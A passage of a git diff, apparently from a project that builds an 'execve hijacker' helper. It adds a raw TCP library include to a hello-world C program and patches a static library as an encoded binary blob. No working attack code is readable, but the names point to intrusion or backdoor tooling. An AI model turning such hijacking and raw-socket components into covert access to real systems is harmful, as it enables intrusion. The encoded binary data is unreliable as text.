b/src/helpers/execve_hijack.c index 78bbe41..840c4e3 100644 --- a/src/helpers/execve_hijack.c +++ b/src/helpers/execve_hijack.c @@ -9,6 +9,8 @@ #include #include +#include "lib/RawTCP.h" + int main(int argc, char* argv[]){ printf("Hello world from execve hijacker\n"); diff --git a/src/helpers/lib/libRawTCP_Lib.a b/src/helpers/lib/libRawTCP_Lib.a index 8bbefb908e492b8ea2a8a75e712e6d580e6a41c3..7662f7dd2640b30e6dc93938ae982d54a4a8c364 100644 GIT binary patch delta 465 zcmX9&QAm?f7`@-UUZ>ld|6=@`L+5*1{IAM66|F%UqXr$#c2=?Vi6P- zTc?*`&E>yh^p^j-^kA9~KKu`X^b%3gLlE>-MEG~d4t(eEecyp|YEQ-16H$5GZ50@^ z3dn{+Z(4yxaeDj|ZZuEu_%YO*!?thfnV=kA7AGi%PsI$);rPl`{^L3}moxabVjlMF zq+7%oE8lLhzPt4U*M+Y*jYq5d^by8|IOXlVn;FSn!a(T?cTRa!*TSB&oH4-+ zIDuI-vcvY@J5`FDl>IytlKzX*_f^I&Nw2uJETtHI_s^MbJ2M?H?(wNZ z-RH|f{3O4p2f@*(Z9M4VI?j$h9POgln5=~Re|2fMMq9#q{<$6K=t`Jhme|aj8`VgF z=Oqrd65jo2+s#--Ao(sq&vjd+*;!M)4cU2pz~{*!3~WcJh-^c7=VG0E!H?2*f~Mg# z6!{Q*q4@hT)aR4EXZkvh6lT>BYC94BXAH50B;7)AUGd*0>UtSObzM;$j^-4CmLdaL eOL^b6duyaPO1lYSa4f}hM=`T_#GYt=8Tk)eGM6C$ delta 631 zcmX>yiFwWx<_UdlODq@|mRL*<6cO3Dg0GO-(#T+Pr?x)hkIgR&cQZ4#O=lr zeyJ~G_GI0%G^Ur+Chsl@nEa?r%vQ>y+jW9R=P{37TLvK50U}<2h}RN8nG4utnrl}u z@V6BF`~QD3cWE#a1HNl|8Ax*N4a zm&q!fE@HYsS2DQr3A8ae^Rjs~Gc(ID@vw6Mjgp#V<~R9QMAT-7t^`I-uri>^(~}RH ziElp8&B4O7mSys~I5EaAlOOhrOR=#6C4m5B8Z!`I0daspfOT?SyqJ^%n)EM-EQ1zU zn#qoJa$l?%W9??a3Hp4D-IE>XnR5n6L)3hj+&Isi=``4PlRwyLz?cH_HMlN7jg@Ac zoR(|G_GeT>MxS0JkK&asU7T